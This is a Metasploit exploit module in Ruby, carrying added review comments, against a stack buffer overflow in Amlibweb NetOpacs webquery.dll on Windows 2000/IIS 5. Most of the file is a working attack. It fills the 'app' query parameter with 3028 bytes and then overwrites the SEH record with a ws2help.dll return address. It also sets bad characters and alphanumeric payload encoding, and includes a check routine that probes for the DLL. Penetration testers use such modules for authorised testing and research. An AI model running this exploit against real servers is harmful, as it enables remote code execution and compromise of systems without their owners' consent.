GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
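class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Path of the vulnerable ISAPI extension as exposed through IIS.
  WEBQUERY_PATH = '/amlibweb/webquery.dll'.freeze

  # Bytes of alphanumeric filler placed in front of the SEH record in the
  # 'app' parameter. This offset is what was tested against the Windows 2000 /
  # IIS 5 target; it is the only supported target for now.
  SEH_OFFSET = 3028

  # Error page the extension returns for a parameter with no value. The
  # parameter name is echoed after "Request:", which is what the check
  # compares against the random token it sent.
  BAD_REQUEST_ECHO = /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Amlib's Amlibweb
          Library Management System (NetOpacs). The webquery.dll
          API is available through IIS requests. By specifying
          an overly long string to the 'app' parameter, SeH can be
          reliably overwritten allowing for arbitrary remote code execution.
          In addition, it is possible to overwrite EIP by specifying
          an arbitrary parameter name with an '=' terminator.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-20112' ],
          [ 'OSVDB', '66814' ],
          [ 'BID', '42293' ],
          [ 'URL', 'http://www.aushack.com/advisories/' ],
        ],
        # The overflow is reached inside the IIS worker process, so the
        # payload runs with that process's privileges.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # 'Space' => 600,
          # Everything that would break or terminate the query string. Note
          # that '=' is listed twice ('=' and "\x3d"); harmless, kept as-is.
          'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
          # The payload travels in a URL query string, so it is kept to the
          # alphanumeric alphabet and NOP sleds are disabled.
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        'Targets' => [
          # aushack - Tested OK 20100803 w2k IIS5
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
        ],
        'DisclosureDate' => '2010-08-03', # 0day
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # RPORT is already registered by the Tcp mixin; re-registering it only
    # changes the default to the usual IIS port.
    register_options(
      [
        Opt::RPORT(80),
      ]
    )
  end

  # Probe for the webquery.dll extension.
  #
  # Sends a request whose only parameter is a random name with an empty
  # value. The extension answers with a "BAD REQUEST" page that echoes the
  # parameter name back; the echoed token is compared against the one sent,
  # so an unrelated error page cannot produce a false positive.
  #
  # NOTE(review): this proves only that the DLL is present and echoes input.
  # No version is fingerprinted, so the Vulnerable verdict is an inference
  # from the endpoint's presence, not from a vulnerable build being confirmed.
  #
  # @return [Exploit::CheckCode] Vulnerable when the echo matches the token,
  #   Safe when the response does not match, Unknown when the host cannot be
  #   reached
  def check
    token = Rex::Text.rand_text_alpha(10)

    begin
      connect
      sock.put("GET #{WEBQUERY_PATH}?#{token}= HTTP/1.0\r\n\r\n")
      res = sock.get_once
    rescue ::Rex::ConnectionError => e
      # An unreachable host is not evidence of safety.
      vprint_error("Connection failed: #{e.message}")
      return Exploit::CheckCode::Unknown
    ensure
      # Always release the socket, even if the read raised.
      disconnect if sock
    end

    echoed = res.to_s.match(BAD_REQUEST_ECHO)
    return Exploit::CheckCode::Vulnerable if echoed && echoed[1] == token

    Exploit::CheckCode::Safe
  end

  # Trigger the overflow through the 'app' query parameter and hand the
  # connection to the payload handler.
  #
  # The request carries SEH_OFFSET bytes of alphanumeric filler followed by
  # the SEH record (next-SEH jump + target.ret handler address, built by the
  # Seh mixin). The filler is alphanumeric so that it, like the payload,
  # survives the query-string parser.
  def exploit
    connect

    seh = generate_seh_payload(target.ret)
    buffer = Rex::Text.rand_text_alphanumeric(SEH_OFFSET) + seh

    # Wire bytes are kept identical to the tested request: the original sent
    # the request line + CRLF followed by CRLF CRLF, i.e. three CRLFs in total.
    # The third is an empty body for IIS and harmless, so it is left as-is
    # rather than risking a change to a tested 0day request.
    request = "GET #{WEBQUERY_PATH}?app=#{buffer} HTTP/1.0\r\n\r\n\r\n"

    print_status("Sending #{request.length} byte request to #{peer}")
    sock.put(request)

    handler
    disconnect
  end
end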